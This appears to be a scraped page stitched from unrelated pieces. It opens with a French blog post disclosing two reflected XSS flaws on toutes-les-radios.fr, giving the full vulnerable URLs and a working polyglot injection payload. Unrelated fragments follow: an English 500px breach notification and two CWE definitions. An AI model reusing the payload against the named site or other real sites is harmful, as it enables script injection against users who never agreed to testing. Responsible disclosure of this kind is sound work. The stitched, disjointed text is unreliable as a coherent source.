Découverte d’un double XSS J’ai découvert 2 XSS sur le site toutes-les-radios.fr Chemin : https://toutes-les-radios.fr/podcast/?radio=France%20Inter&name=PAYLOAD Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`OPENBUGBOUNTY`%20//%3E Chemin : https://toutes-les-radios.fr/?name=PAYLOAD&cover=chadafm.jpg&url= http://broadcast.infomaniak.net/chadafm-high.mp3&path=&streamid=&type=other&mtpt= Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter= confirm`OPENBUGBOUNTY`%20//%3E Note : Voulant les envoyer directement par OpenBugBounty, j’ai reçu ce message A vulnerability on this domain has just been reported by another researcher. Please try again […]
Our engineering team recently learned of a potential security issue affecting your 500px user account. We are taking this issue extremely seriously and have taken immediate action to address the situation and ensure the protection of our users’ data.
We are writing to let you know that we recently discovered that some user data was compromised as a result of unauthorized access to our systems by a malicious third party. We are very sorry for any concern or inconvenience this may cause. We are working rapidly to investigate the situation further and take the appropriate steps to prevent such incidents in the future.
CWE-200 An information exposure is the intentional or unintentional disclosure of information to an actor that is not explicitly authorized to have access to that information.
The product does not validate or incorrectly validates input that can affect the control flow or data flow of a program.